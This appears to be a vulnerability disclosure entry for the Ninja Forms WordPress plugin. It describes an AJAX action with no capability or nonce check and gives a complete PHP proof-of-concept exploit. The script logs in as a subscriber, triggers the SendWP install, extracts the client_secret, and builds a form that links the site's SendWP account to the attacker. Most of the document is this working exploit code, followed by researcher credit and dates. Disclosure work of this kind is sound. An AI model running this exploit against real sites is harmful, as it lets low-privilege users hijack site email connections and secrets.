The AJAX action, wp_ajax_ninja_forms_sendwp_remote_install_handler, did not have a capability check on it, nor did it have any nonce protection, therefore making it possible for low-level users, such as subscribers, to install and activate the SendWP plugin and retrieve the client_secret key needed to establish the SendWP connection while also installing the SendWP plugin.
Usage: php poc.php subscriber password Take the html output and use that to create a form that allows you to make the SendWP connection. <?php // Settings $wp_url = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; // Log in as subscriber $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); // Set redirect url $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'action' => 'ninja_forms_sendwp_remote_install', ]); $content = curl_exec($ch); $pattern = '\\'; $replacement = ''; preg_match('/"client_secret":"([^"]+)"/', $content, $matches); $match1 = $matches[1]; $client_secret = str_replace($pattern, $replacement, $match1); preg_match('/"register_url":"([^"]+)"/', $content, $matches); $match2 = $matches[1]; $register_url = str_replace($pattern, $replacement, $match2); preg_match('/"client_name":"([^"]+)"/', $content, $matches); $match3 = $matches[1]; $client_name = str_replace($pattern, $replacement, $match3); preg_match('/"client_redirect":"([^"]+)"/', $content, $matches); $match4 = $matches[1]; $client_redirect = str_replace($pattern, $replacement, $match4); echo '<html>'; echo '<body>'; echo '<form action="https://sendwp.com/_/signup" method="POST">'; echo '<input type="hidden" name="client_name" value="' . $client_name .'" />'; echo '<input type="hidden" name="client_url" value="' . $register_url . '" />'; echo '<input type="hidden" name="client_redirect" value="' . $client_redirect . '" />'; echo '<input type="hidden" name="client_secret" value="' . $client_secret . '" />'; echo '<input type="submit" value="Submit request" />'; echo '</form>'; echo '</body>'; echo '</html>'; ?>
Chloe Chamberland
Chloe Chamberland
Yes
2021-02-16 (about 1 years ago)
2021-02-17 (about 1 years ago)
2021-02-22 (about 1 years ago)